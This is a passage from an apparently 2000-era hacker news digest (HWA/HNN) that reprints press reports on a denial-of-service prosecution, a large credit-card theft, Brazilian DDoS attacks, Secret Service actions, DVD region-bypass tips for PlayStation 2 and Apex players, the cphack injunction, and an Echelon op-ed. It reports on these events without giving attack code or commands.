he became involved in a dispute with his employers, according to U.S. Attorney Loretta Lynch. He was arraigned in federal court in Brooklyn yesterday and ordered held without bail, Lynch said. ITTI's software system allows securities firms to trade Nasdaq stocks online, a representative for the company said. It is marketed by other firms, such as Trimark Group, under their own brand names, she said. The system links small broker-dealers with market-makers like Knight/Trimark, Mayer & Schweitzer and others, a Knight/Trimark spokesman said. Firms use it so they don't have to install and maintain direct hardware and software connections to market-makers. Smires' attacks caused "significant interruption of ITTI's trade execution over the past three business days," Lynch said. "If the attacks had continued to cause denial of service, the viability of ITTI would have been threatened, resulting in major disruption of trading on the Nasdaq," she added. The U.S. Secret Service's Electronic Crimes Task Force, which is a cooperative effort of 25 local, state and federal agencies and 45 private companies, helped trace Smires' computer attacks, said Bob Weaver, a Secret Service representative. Conflict developed between Smires and his bosses when ITTI's chief development officer, who had hired Smires and was his supervisor, resigned March 6, according to an affidavit filed in the case by Secret Service Agent Peter Cavicchia. The firm then hired systems consultants to help fill the gap created by the departure, but Smires and another, unidentified programmer refused to help train the newcomers on ITTI's systems, according to the affidavit. Smires and the other programmer then told the firm's executives that they would quit unless they were given "more employment security, a greater salary and a greater equity interest in the firm," Cavicchia said. ITTI responded by offering them one-year employment contracts, raises and stock options, he said. Smires and the other programmer nevertheless decided to resign, according to the affidavit. The pair demanded "$70,000 immediately, 50,000 stock options and more substantial salary increases," Cavicchia said. A "tentative agreement" was reached March 8, Cavicchia said. The next day, Smires and the other programmer backed out of the agreement, demanded more favorable terms and said ITTI executives should call them only if the firm agreed to the specific counter-offer, Cavicchia said. ITTI didn't call. Later on March 9, the attacks on ITTI's system began. The attacks continued Friday, Monday and yesterday, according to the affidavit, shutting down ITTI's computers for a total of about five hours. "While one of the attacks was occurring, ITTI computers revealed the Internet Protocol address of the attacking computer," enabling employees to trace it to a building on the Queens College campus in Flushing, New York, where Smires is an instructor, Cavicchia said. Secret Service agents were told that the particular Queens College computer from which the attack was launched was being used by Smires at the time, the affidavit said. After his arrest, Smires admitted that he was responsible for the March 13 and March 14 attacks, Cavicchia said. Smires also waged some of his attacks from a Kinko's copy shop in Manhattan, Lynch said. Copyright 2000, Bloomberg L.P. All rights reserved. -=- Assoc.Press; 404 @HWA 35.0 HNN:Mar 16th:PlayStation2 can Play US DVD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Some DVDs released for the North American Region can be played on PlayStation2 consoles in England. While pressing buttons in a certain sequence while the PlayStation2 boots up into DVD mode can sometimes allow Region 1 CDs to be played on the Region 2 device. (Wonder if this will have any effect on the DeCSS lawsuit?) The Register UK http://www.theregister.co.uk/000315-000017.html Gaming Intelligence Agency http://www.thegia.com/news/0003/n11a.html Register; Posted 15/03/2000 5:04pm by Linda Harrison PlayStation 2 can play US DVDs - apparently Gaming boffins claim to have found a way to play American DVDs on PlayStation 2 consoles. Three codes have surfaced which make it possible to play Region 1 (North America) DVDs on the PlayStation 2 -- a Region 2 (Europe, Japan and Asia) DVD player. Like console video games, DVDs are usually fixed by vendors so they can only operate within specific world markets. It was previously believed the PlayStation 2, launched solely in Japan, could play only Region 2 DVDs. But the Gaming Intelligence Agency's Web site this week claimed to have found the codes needed to overcome this inconvenience. These codes do not work every time -- a hitch believed to be linked to how hard the Dual Shock 2' buttons are pressed. "All three codes should be entered when the PlayStation 2 DVD bootup sequence begins fading to black... If you get a region failed message, don't despair; just try again. The same disc will work some times and not others," it reports. "While these codes certainly leave room for improvement, the advent of any region bypass is good news for system importers and DVD fans," thegia.com adds. Sony Computer Entertainment in the UK chose not to comment.� -=- GIA; Play American DVDs on Japanese PlayStation 2 [03.11.00] � Simple controller codes make it possible. Two simple controller codes have recently surfaced that make it possible to play Region 1 (North America) DVDs on the PlayStation 2, a Region 2 (Japan and Asia) DVD player. Much like console videogames, DVDs are region encoded to dissuade consumers from importing titles from outside of the country. It was previously believed that the PlayStation 2 would only play Region 2 DVDs. These codes currently only work with about partial frequency. We are currently unsure why they do not work 100% of the time; we believe they may be dependent on how hard the user presses the Dual Shock 2's analog buttons. If you own a PS2 and Region 1 movies, the GIA is interested in hearing about your experiences with the code, especially if you find a way to make Region 1 movies play with greater frequency. Please e-mail staff@thegia.com with the movie tested, code used, and the tries / success ratio. All three codes should be entered when the PlayStation 2 DVD bootup sequence begins fading to black. The buttons should be held until either the DVD movie starts up (1 line of Japanese) or a "region failed" message appears (2 lines of Japanese). If you get a region failed message, don't despair; just try again. The same disc will work some times and not others. The first code comes from the GIA's own J.T. Kauffman; it is apparently circulating Japanese message boards and web sites. The code is: hold down L1, Circle, and Select. This code has worked with both the Dual Shock 1 and 2 with about 40% accuracy. The second code comes from a friend of the GIA known as Barubary. The code is: press in L3 (the left analog stick) straight and hard. This code does not work with the Dual Shock 1, but works with the Dual Shock 2 with about 60% accuracy. The newest, third code comes from GIA friend Nick "Rox" Des Barres. Nick reports that this code works an astounding 95% of the time. The instructions follow: Insert a first-generation PlayStation pad (i.e., not an analog controller) in Control Port 1 of the PS2. Insert DVD Hold UP on the pad until the DVD menu appears Highlight the play icon and select it. Nick adds, "I tried this on 20 or so DVDs, and it booted all of them. Two or three would not play. You could access the menus, however. It should be noted I was using a Japanese first-generation PS1 pad, though I can't imagine why it wouldn't work with American ones." While these codes certainly leave room for improvement, the advent of any region bypass is good news for system importers and DVD fans. The GIA will keep you posted on any new developments on the PS2 DVD front. @HWA 36.0 HNN:Mar 16th:ISTF Releases Security Recommendations ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Chris The Internet Security Task Force, a conglomeration of big name tech companies ISPs and other e-business firms have produced a "vendor neutral set of recommendations in understandable language" about the problems and solutions in internet security. The paper doesn't say anything new, but because it was released by "credible" vendors and not "the evil underground" some suits might finally pay attention. But then again, maybe not. Initial Recommendations For Conducting Secure eBusiness http://www.ca.com/ISTF/recommendations.htm @HWA 37.0 HNN:Mar 17th:485,000 Credit Cards Numbers Stolen, Found on Gov Computer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A file containing credit card numbers, expiration dates, names and addresses was found last year on a US government website. The thief has been traced back to a European country but it has not been revelaed which one. It is also not been revealed which online service the numbers came from or which government agency was unwittingly storing the numbers. The incident has been confirmed by the Secret Service but first came to light when a bank employee notified reporters. The bank received the notice of the credit card heist from Visa however failed to notify its card holders. MSNBC http://www.msnbc.com/news/382561.asp Vast online credit card theft revealed Hacker hid data on 485,000 cards on U.S. agency�s Web site By Mike Brunker � MSNBC March 17 � In the largest known case of cybertheft, a computer intruder stole information on more than 485,000 credit cards from an e-commerce site and then secretly stored the massive database on a U.S. government agency�s Web site, MSNBC.com has learned. Credit card companies notified financial institutions, but many of the compromised accounts remain open to this day because the banks neither closed them nor notified customers of the theft. THE HEIST occurred in January 1999, but only a few details have previously been made public. The scope of the crime emerged in a letter dated Dec. 27 from Visa USA to member financial institutions. Jim Macken, a Secret Service spokesman, confirmed that the incident had occurred and added some details in an interview on Thursday. Two arrested in online credit card case The Visa letter, a copy of which was provided to MSNBC by a source in the banking industry, quotes federal authorities as saying that the credit card information � including expiration dates and cardholder names and addresses � was stolen from an Internet retail site by a hacker. It said the store of data on Visa, MasterCard, American Express and Discover cards was discovered on an unspecified government computer system during an audit. The letter did not say when the stolen data was found, but Macken said it was discovered before March 1999 on the Web site of a U.S. government agency, which he declined to identify. .This government Web administrator noticed that a lot of the memory was chewed up for no reason, so he checked and found the file (containing the stolen data),. he said. NO EVIDENCE OF FRAUDULENT USE There was no evidence that any of the cards were used to commit fraud and some of the accounts were not active, Macken added. The letter said that authorities had not identified the thief, but Macken said investigators have since traced the criminal to Eastern Europe. The investigation is ongoing and involves diplomatic contacts with the country in question, he said. The Internet retail site from which the data was stolen has also since been identified, but Macken declined to name it. It was unclear why the thief hacked the government Web site and stored the data there, Macken said, though he allowed that the act might have been the online equivalent of thumbing one�s nose at U.S. authorities. As MSNBC reported last week, U.S. authorities have so far been stymied in their attempts to prosecute credit card thieves and fraud rings based in the former Soviet bloc nations and Asia. Overseas fraud artists are untouchable Secret Service officials testified about some details of the case before Congress early last year to demonstrate the peril that computer hackers pose to online commerce, Macken said. Their comments generated little coverage, however, and the scope of the case is only now becoming clear. EFFORT TO HIGHLIGHT INACTION The copy of the letter from Visa was obtained by MSNBC from an employee at the Navy Federal Credit Union, in Merrifield, Va., the world�s largest credit union with 19 million members. The letter was provided, the source said, to highlight the fact that some financial institutions are failing to act to protect consumers when there is evidence that their credit card information has been stolen. Officials at the credit union took no action to warn customers whose account numbers were among those stolen by the hacker, said the source, who spoke on condition of anonymity. Instead, they ordered a .spot check. of 50 to 100 accounts and then decided that no further action was necessary, the source said. The source said the same procedure was followed two weeks later, when Visa alerted the institution of the theft of data on 300,000 credit cards from the CD Universe Web site � the biggest theft of credit card data over the Internet that previously had been made public. .It was decided that ... it would be too much of an inconvenience and too costly to shut down the accounts and issue new numbers,. said the source. .It was deemed not the credit union�s responsibility.. The credit union source said that fraudulent charges have subsequently appeared on some of the accounts that were compromised, though it is impossible to definitively link the fraud to the theft. CREDIT UNION RESPONDS In a statement issued Friday in response to MSNBC.com�s story, Navy Federal Credit Union officials did not challenge the assertion that they did not warn customers of the theft. But they denied that cost or inconvenience were factors in the decision. .When we received notification of this problem from VISA USA, we reviewed our systems and were confident that all appropriate controls were in place to protect our members� financial welfare,. said Tom Steele, a credit union vice president in charge of the credit card division. .Additional checks of the 1,500 Navy Federal credit card accounts identified by VISA USA confirmed that the steps we had taken safeguarded every cardholder � we have also not seen any increase in fraud losses.. The statement also indicated that no Navy Federal cardholders have been victims of identity theft as a result of the heist. Calls to American Express and a half dozen major banks seeking information on their response when notified of the theft were not returned. Scott Lynch, a spokesman for Visa USA, said he could not comment on the case. Nor would he explain why Visa didn�t notify its members of the theft until December. Alicia Zatkowski, a spokeswoman for Discover Financial Services, said the firm�s fraud investigators were not aware of such a case. Vincent DeLuca, vice president of fraud control at MasterCard International, said, .We are aware of some cases but we�re not at liberty to talk about any ongoing investigations. Several financial institutions ordered the wholesale closure and replacement of cards that were compromised in the CD Universe case, which also remains under investigation. Such across-the-board replacement programs were well publicized in an effort to assure online consumers. Banks and credit card companies often point out that consumers are responsible only for the first $50 of fraudulent online purchases � and that is nearly always waived. But stolen credit card information can be used to commit fraud against unsuspecting Internet merchants, who in most cases bear the cost of the crime, or for identity theft � a practice in which criminals use personal data to obtain new credit, borrow money or make big-ticket purchases. The Treasury Department on Wednesday held a two-day national summit on identity theft to focus attention on what Treasury Secretary Lawrence Summers described as .a growing and major criminal threat.. At the session, victims said that while they did not ultimately have to pay for the losses run up in their names, identity theft is by no means a victimless crime. .It has been sheer hell, and I do mean hell,. said Darlene Zele, a Rhode Island hospital worker who one of the victims who testified about years of struggling to repair the havoc wrought on their credit records. .At this point, after five years, it�s still not over.. Got a tip about the use or abuse of credit cards online? Write to tipoff@msnbc.com. @HWA 38.0 HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by webmaster A group called DDoS-BR is spreading denial of service attacks against Brazilian government networks. The Brazilian Supreme Court and the National Telecommunications Agency web sites have been shutdown for most of the week due to the attacks. The Brazilian authorities are looking forward legislation that will soon be approved which might give the federal police enough power to investigate and arrest electronic criminals. (Hopefully they have the knowledge to use that power wisely.) SecureNet - In Spanish correction: Portuguese ... http://www.securenet.com.br/cgi-bin/news?id=15030003 @HWA 39.0 HNN:Mar 17th:Secret Service Harassing Bernie S Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by macki Five years to the day after Bernie S. was arrested at gunpoint and subjected to nearly 17 months of imprisonment by the United States Secret Service, agents of the USSS have again begun some kind of cat and mouse game, the nature of which has yet to be revealed. 2600 http://www.2600.com/news/2000/0317.html SECRET SERVICE HARASSING BERNIE S AGAIN 03/17/00 Five years to the day after Bernie S. was arrested at gunpoint and subjected to nearly 17 months of imprisonment by the United States Secret Service, agents of the USSS have again begun some kind of cat and mouse game, the nature of which has yet to be revealed. A Special Agent from the Secret Service showed up unannounced at Bernie's workplace and told his employer they wanted to question Bernie, who happened to be out sick that day. When Bernie returned to work the following day and discovered the Secret Service wanted to talk to him, he surprised the agent by calling him. What followed was an extremely strange and circular conversation. At first the SS agent wouldn't talk to him at all. Then he called Bernie back and said they needed to talk with him at his home at 7am the next morning. When Bernie explained he was just getting over a serious illness and that this was an unreasonable hour, the agent suggested 6am. Bernie repeatedly offered to answer their questions at several neutral locations, but they said any place other than his home was unacceptable. Bernie told them he had nothing to hide, but that he was not comfortable having Secret Service agents poking around inside his house and that they would have to get a warrant before he'd let them in. The agent then said he had to go and would talk to him later. About ten minutes later, a second, more polished, SS agent called Bernie and continued trying to persuade him to let them inside his home. The agent tried to goad Bernie by implying he must have something to hide, and that if he didn't then there was no reason why they shouldn't be allowed inside his home. At this point, Bernie tried to explain by saying if you asked 100 people on the street if they'd want federal agents in their living room and bedroom, almost everyone would say no and that he was no exception. The SS agent disagreed, saying people have no legitimate fears about such a visit. Bernie repeatedly tried to get the SS agents to tell him what they wanted. Finally, the second agent said, "I need to check to see if your telephone and Cable TV wiring is hooked up properly." This preposterous claim made Bernie actually laugh out loud. But as a further gesture of cooperation, Bernie offered to allow Bell Atlantic and Comcast Cable TV technicians to inspect his house wiring for them. The SS agents said that, too, would be unacceptable. It became clear the SS agents were simply trying anything they could to get a foot in his door. Needless to say, after Bernie's previous horrendous experience with the Secret Service, their feet are not welcome in his home. He then gave them his attorney's name and telephone number and told them to address future inquiries directly to his lawyer. So what is this all about? We don't know yet, but clearly something is up. And the way the Secret Service has played sick games with people's lives in the past, we felt it would be wise to alert everyone now so we can all keep a closer eye on them before they try any further outrageous actions under the veil of secrecy. @HWA 40.0 HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The U.S. Secret Service and Citicorp, a unit of New York-based Citigroup Inc., are working together to develop a pilot program to fight identity theft and other types of e-commerce fraud. The program will devise a strategy to identify suspicious e-commerce activities, including forged identities and other schemes used to commit bank and credit fraud. Computer World http://www.computerworld.com/home/print.nsf/all/000316C9BE US Treasury Dept. - Press Release http://www.ustreas.gov/press/releases/ps465.htm Computer World; Secret Service, Citicorp team to fight e-commerce fraud U.S. Treasury Department announces new initiatives to combat identity, other types of e-commerce fraud By Linda Rosencrance 03/16/2000 The U.S. Secret Service and Citicorp, a unit of New York-based Citigroup Inc., are working together to develop a pilot program to fight identity theft and other types of e-commerce fraud, according to a statement issued by the U.S. Treasury Department. The announcement was made at the two-day National Summit on Identity Theft convened by Treasury Secretary Lawrence H. Summers yesterday. The summit includes more than 150 participants from federal, state and local government agencies; financial institutions; credit-card companies and reporting agencies; as well as identity theft victims and consumer advocacy groups. "Criminals are exploiting new technologies to make a significant profit from an old crime," Summers said in the statement. "We will continue to work with the private sector to strengthen our efforts to combat this threat." The program being developed by the Secret Service and Citicorp will devise a strategy to identify suspicious e-commerce activities, including forged identities and other schemes used to commit bank and credit fraud. At yesterday's summit, Summers also said that the Secret Service is developing a computer-based training program to help law enforcement officials handle financial crimes. -=- Press Release; TREASURY NEWS FROM THE OFFICE OF PUBLIC AFFAIRS FOR IMMEDIATE RELEASE March 15, 2000 LS-465 TREASURY CONVENES IDENTITY THEFT SUMMIT Treasury Secretary Lawrence H. Summers convened a two-day National Summit on Identity Theft today and announced four new initiatives targeted at cracking down on the increasing threat of identity theft. Criminals are exploiting new technologies to make a significant profit from an old crime," said Treasury Secretary Summers. "We will continue to work with the private sector to strengthen our efforts to combat this threat." Called for last year by President Clinton, the Summit will address the prevention of identity theft, remediation and enforcement efforts with the public and private sector. The Summit will consist of a series of panels and more than 150 participants from federal, state and local government agencies, financial institutions, credit card companies and reporting agencies, as well as identity theft victims, consumer advocacy groups and private sector representatives. The four new Treasury initiatives to help combat identity theft include: Skimming and counterfeit check databases currently used to identify common suspects, defendants of identity theft, and address criminal trends prevalent in financial crimes today. These databases were developed and are maintained by the U.S. Secret Service in partnership with the financial industry; A computer-based training module developed by the U.S. Secret Service that will focus on financial crimes and all pertinent statutes including identity theft, and be made available within the agency as well as local and state law enforcement officials throughout the U.S.; A pilot program, developed by the U.S. Secret Service and Citicorp, to help identify suspicious activity on electronic commerce. The program will attempt to develop a protocol for the identification of identity theft and other schemes used to commit bank fraud, credit fraud and money laundering within electronic commerce and the immediate notification of law enforcement authorities; and Forums and mini-conferences to maintain a dialogue between the private and public sector. Treasury's National Summit on Identity Theft is the first national level conference involving law enforcement, victims, industry and nonprofits interested in the issue. @HWA 41.0 HNN:Mar 17th:Computer History Lecture Series ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre The Computer Museum History Center, a non-profit entity dedicated to the preservation and celebration of computing history, will be having a lecture series entitled "Early Computer Crime". Speakers include Whitfield Diffie, John Markoff, Peter Neumann and Cliff Stoll. The Lecture will be held on Thursday, March 23, 2000 at NASA Ames Research Center Auditorium, Moffett Field, Mountain View, CA. It is requested that RSVPs be received by Monday March 20. (Sounds like fun. I would like to cheer some the speakers and heckle others.) The Computer Museum http://www.computerhistory.org/events/earlycrime_03232000/ @HWA 42.0 HNN:Mar 17th: Australian Police To Increase Online Presence ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Australian Federal Police Commissioner Mick Palmer said that in an effort to get better training for the people they already have and in an effort to attract more qualified applicants the Police will conduct a staff exchange with private industry. The commissioner will also establish an Electronic Crime Steering Committee to evaluate Australia's capacity to fight electronic crime and will develop an Australian Law Enforcement Electronic Crime Strategy by mid summer. The Age http://www.theage.com.au/breaking/0003/17/A15120-2000Mar17.shtml Police to step up fight against e-crime Source: AAP | Published: Friday March 17, 3:38 PM Police are set to recruit computer boffins in a bid to boost the fight against so-called e-crime. The potential to commit crimes using computers and other information technology was one of the greatest problems ever to face law enforcement, Australian Federal Police Commissioner Mick Palmer said today. Speaking at the end of a week-long conference of police commissioners from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner Palmer said a staggering 900 million people would be using the Internet by the end of this year. 'People who abuse these technologies have the capacity to commit offences on a global basis, with complete anonymity, with speed and on a scale not previously encountered,' Commissioner Palmer told journalists. Credit card fraud, electronic vandalism, terrorism, electronic money laundering and tax evasion are some examples of electronic crime. 'The capacity of properly organised, electronic based crime to undermine the financial stability of small and medium sized countries is very real,' Commissioner Palmer said. A major problem for police is how to attract personnel with enough technical expertise to fight this new crime. Commissioner Palmer said already police recruitment and selection was becoming more flexible. 'Clearly some of the technical skills that we are going to need ... come at a very high cost,' he said. 'People ... in that industry are earning a lot of money and that makes the partnerships with business and the wider business community very important.' Police will be looking to exchange staff with private industry to gain the skills necessary, probably on short term, project based arrangements. Commissioner Palmer said discussions and negotiations had already begun on this issue and Commonwealth Bank CEO David Murray addressed the commissioners. 'We will be recruiting people from the coalface for short periods of time, we are going to be sharing resources between ourselves and the wider partnership both in the private and public sense.' The commissioners agreed to establish an Electronic Crime Steering Committee to evaluate Australasia's capacity to fight electronic crime. It will develop an Australasian Law Enforcement Electronic Crime Strategy by the end of June. @HWA 43.0 HNN:Mar 17th:Apex DVD Defeats Region and Macrovision ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sciri Hot on the trail of the PlayStation2 being able to play Region 1 discs is the Apex AD-600A, a DVD/VCD/CD/MP3 player that can disable CSS, Region and Macrovision settings after entering a simple code (Preferences -> Step -> Prev Track -> Next Track). Review of the Apex-600A http://uberauk.epinions.com/elec-review-10C9-40ABFE-388DCD5F-bd3 Nerd Out http://www.nerd-out.com/ @HWA 44.0 HNN:Mar 20th:First Malicious Code Direct at WebTV ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Hal0 Microsoft is working on a patch of its service to counteract malicious programming code that overloads WebTV newsgroup discussions with fake postings. While the malicious code self replicates like a virus Microsoft insists on calling it malicious code. The code appends itself to a WebTV users signature file and then cross posts itself to numerous newsgroups. Wired http://www.wired.com/news/technology/0,1282,35045,00.html WebTV's 'Non-Virus' Virus by Chris Oakes 3:00 a.m. Mar. 18, 2000 PST Although it prefers to call the trouble a "malicious code," WebTV has experienced its first virus. Parent company Microsoft is working on a patch of its service to counteract malicious programming code that overloads WebTV newsgroup discussions with fake postings. "Newsgroups are starting to flood with junk posts, and you can't post," said Brian Bock, editor-in-chief of Net4TV Voice, an online publication focusing on Internet services via television. WebTV users first reported the problem to Net4TV. Bock said the virus -- a first for the closed, non-PC WebTV system -- is like the renowned PC virus Melissa. The similarity is that it self-replicates, he said. But this virus does it by altering signatures that appear at the bottom of WebTV user's Usenet messages. "When another WebTV user runs across [an infected message], it writes the virus into their email signature," he said. "Then when they go make a Usenet posting, it cross-posts. They end up posting to a whole bunch of different news groups." The result is the multiplication of junk messages in discussion forums until discussions are disrupted completely because the system's maximum number of viewable messages is reached. Microsoft was extremely reluctant to call the problem a virus. "It's not a virus," said Microsoft spokeswoman Claire Haggard. "There's never been a virus on WebTV." Then what is it? Haggard said the problem was malicious code in WebTV's Usenet posting system. The company took issue with the description of the code as "self-replicating," saying it had to be "manually" inserted in Usenet posts and didn't self-replicate. Furthermore, Haggard said the multiplying Usenet messages did not involve the exploitation of a user's signature. Bock said the virus does make use of an existing flaw in the service's email system. That hole is exploited along with a WebTV code for posting messages, Bock said. The issues are separate, Haggard said. In any case, the problem gets awfully close to meeting the conventional definition of virus: a malicious code that, once installed, performs usually undesirable tasks on the victim's computer. In most technical definitions, self-replication is not a prerequisite, although the Merriam-Webster definition of virus does include self-replication: "A computer program usually hidden within another seemingly innocuous program that produces copies of itself." Virus or not, manual or self-replicating, the malicious code will be patched, hopefully by next week, the company said. Meanwhile, WebTV will be removing the junk posts. Haggard said the company has only heard from 14 users inquiring about the problem. She said the company plans a regular update of its client and server software soon, and that "the upgrade will be made immune from such hacker problems." @HWA 45.0 HNN:Mar 20th:Liberia Claims Attack In CyberWar ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench President Charles Taylor of Liberia has claimed that his country is under attack in a cyber war but failed to say by whom. He made the statement after his government shut down two independent radio stations and their related web sites. Amnesty International and the US State Department have vigorously protested the station closings. Wired http://www.wired.com/news/politics/0,1283,35016,00.html 'Cyber War' in Liberia Reuters 7:00 a.m. Mar. 17, 2000 PST MONROVIA -- President Charles Taylor of Liberia, reacting to criticism of the government's closure of two radio stations, said a "cyber war" had been declared on his country. "A cyber war has been declared on Liberia and the government is doing everything possible to fight back," he said on Thursday at his Executive Mansion after signing into law seven bills. He did not say who was waging this war. Star, an independent radio station that was closed down on Wednesday, had an Internet news service popular with Liberians abroad that was also closed. The government justified the closures by saying that "agents provocateurs" were using the news media, especially radio stations, to create security problems. "The government took the action to prevent an outbreak of another war which could be caused by negative broadcasts to create hatred among the Liberian people through hate messages," Taylor said. Taylor's election in 1997 formally ended a civil war that he started in December 1989. The U.S. government joined human rights groups, local media, and the Press Union of Liberia in protesting against the closures. "The United States vigorously protests the unwarranted closure of these two radio stations and calls on the Government of Liberia to reopen them immediately, without conditions, and to return the confiscated equipment," the U.S. State Department said in a statement. Rights group Amnesty International has linked the closure of Star to a March 13 broadcast it made about a U.S. State Department report on human rights in Liberia. Star was established in 1997 by the Hirondelle Foundation, a Swiss-based non-governmental organization, with the help of the United States Agency for International Development. The second station, Radio Veritas, is run by the Roman Catholic Church. The government suspended the station but said it could start operating again if it provided a written assurance it would broadcast only religious material. The Catholic Archbishop of Monrovia said Veritas had a constitutional right to broadcast. "It is our constitutional right to disseminate information to the public and if we abuse the right, let the courts deal with us, not the executive," Archbishop Michael Kpakala Francis said in a statement released late on Thursday. "We will not give any commitment to the government of Liberia that will restrict us to religious programs," he added, denying that Veritas' license restricted it to religious broadcasts. @HWA 46.0 HNN:Mar 20th:Judge Bans Anti-Filter Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Aj U.S. District Judge Edward F. Harrington has granted an injunction requested by Microsystems Software Inc. to prevent distribution of cphack. Cphack was designed to bypass the surfing restrictions used by CyberPatrol as well as list every web site blocked by the software. The Judges decision effectively blocks anyone from distributing the software. There were no defendants present at the hearing, the next hearing is scheduled for March 27th. (This could be a rather serious threat to peoples' right to reverse engineer and to even write software.) MSNBC http://www.msnbc.com/news/383603.asp Associated Press - via Washington Post http://www.washingtonpost.com/wp-srv/aponline/20000317/aponline133352_000.htm Porn Software Injunction Issued By Martin Finucane Associated Press Writer Friday, March 17, 2000; 1:33 p.m. EST BOSTON �� A federal judge Friday ordered a halt to the distribution of a computer program that allows children to bypass software designed to keep them away from Internet pornography. Microsystems Software Inc. of Framingham, which sells the widely used "Cyber Patrol" filtering software, sued two computer experts who distributed the bypassing software via the Internet. The software, called "cphack," also discloses a list of sites that are blocked by the Cyber Patrol program. U.S. District Judge Edward F. Harrington ordered Matthew Skala, a self-described cryptography buff who attends the University of Victoria in British Columbia, and Eddy L.O. Jansson, believed to be living in Sweden, to stop spreading the "cphack" program. The judge also blocked distribution of the "cphack" software by anyone working with them. Microsystems attorney Irwin Schwartz said the judge's order extended to any "mirror" Web sites, where the program may have been copied and made available. Another hearing is set for March 27 on the case. Skala and Jansson were not represented at Friday's hearing, and they did not immediately return e-mails seeking comment. Microsystems has said in its legal filings it would suffer "irreparable harm" from the publication of the bypassing software, which it said sought to destroy the market for its product by rendering it ineffective. "The practical effect is that ... children may bypass their parents' efforts to screen out inappropriate materials on the Internet," according to the filing made this week. Free speech advocates criticized the company's move to block distribution of the software. Peter Junger, a law professor at Case Western Reserve University in Cleveland and an advocate of free speech on the Internet, said it "looks like a rather horrifying challenge to people's right to write software" and to "reverse-engineer" software, which means figure out how it works. "The idea that one can prevent reverse-engineering of software and publishing the results of that reverse-engineering strikes me as a very dangerous restriction on free speech," he said before the judge's ruling. Chris Hansen, a senior lawyer with the national office of the American Civil Liberties Union, said there might be debate about whether distributing the bypass software was legal, but that the ACLU agreed with at least one role of the software � publicizing the list of blocked sites. "Parents who want to install these products ought to be able to do so," he said, adding, "How can you, as a parent, make an intelligent decision (on filtering software)if the product won't tell you what they're blocking?" � Copyright 2000 The Associated Press @HWA 47.0 HNN:Mar 20th:We Spy To Prevent Bribes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A former Director of Central Intelligence, R. James Woolsey, has written a story about why the United States spies on its allies. The primary reason given is to prevent bribery so that US companies can compete on an even playing field. (Sorry but I don't buy it, that is too much power for such a simple purpose but I guess the ends justify the means for the US Government. So why can't US citizens spy on their own government to make sure they are complying with the law? Where are the checks and balances?) Wall Street Journal - via Cryptome http://cryptome.org/echelon-cia2.htm 17 March 2000. Thanks to DB. We look forward to seeing and hearing James Woolsey and Duncan Campbell openly debate this controversy, in Congressional hearings, on global TV, the Internet, MilNet and IntelNet -- and all the Echelon surveillance stations based in countries of those who "can't compete with the US." See transcript of Woolsey's March 7 remarks on economic espionage to the Foreign Press Center: http://cryptome.org/echelon-cia.htm The Wall Street Journal, March 17, 2000 Why We Spy on Our Allies By R. James Woolsey, a Washington lawyer and a former Director of Central Intelligence. What is the recent flap regarding Echelon and U.S. spying on European industries all about? We'll begin with some candor from the American side. Yes, my continental European friends, we have spied on you. And it's true that we use computers to sort through data by using keywords. Have you stopped to ask yourselves what we're looking for? The European Parliament's recent report on Echelon, written by British journalist Duncan Campbell, has sparked angry accusations from continental Europe that U.S. intelligence is stealing advanced technology from European companies so that we can -- get this -- give it to American companies and help them compete. My European friends, get real. True, in a handful of areas European technology surpasses American, but, to say this as gently as I can, the number of such areas is very, very, very small. Most European technology just isn't worth our stealing. Why, then, have we spied on you? The answer is quite apparent from the Campbell report -- in the discussion of the only two cases in which European companies have allegedly been targets of American secret intelligence collection. Of Thomson-CSF, the report says: "The company was alleged to have bribed members of the Brazilian government selection panel." Of Airbus, it says that we found that "Airbus agents were offering bribes to a Saudi official." These facts are inevitably left out of European press reports. That's right, my continental friends, we have spied on you because you bribe. Your companies' products are often more costly, less technically advanced or both, than your American competitors'. As a result you bribe a lot. So complicit are your governments that in several European countries bribes still are tax-deductible. When we have caught you at it, you might be interested, we haven't said a word to the U.S. companies in the competition. Instead we go to the government you're bribing and tell its officials that we don't take kindly to such corruption. They often respond by giving the most meritorious bid (sometimes American, sometimes not) all or part of the contract. This upsets you, and sometimes creates recriminations between your bribers and the other country's bribees, and this occasionally becomes a public scandal. We love it. Why do you bribe? It's not because your companies are inherently more corrupt. Nor is it because you are inherently less talented at technology. It is because your economic patron saint is still Jean Baptiste Colbert, whereas ours is Adam Smith. In spite of a few recent reforms, your governments largely still dominate your economies, so you have much greater difficulty than we in innovating, encouraging labor mobility, reducing costs, attracting capital to fast-moving young businesses and adapting quickly to changing economic 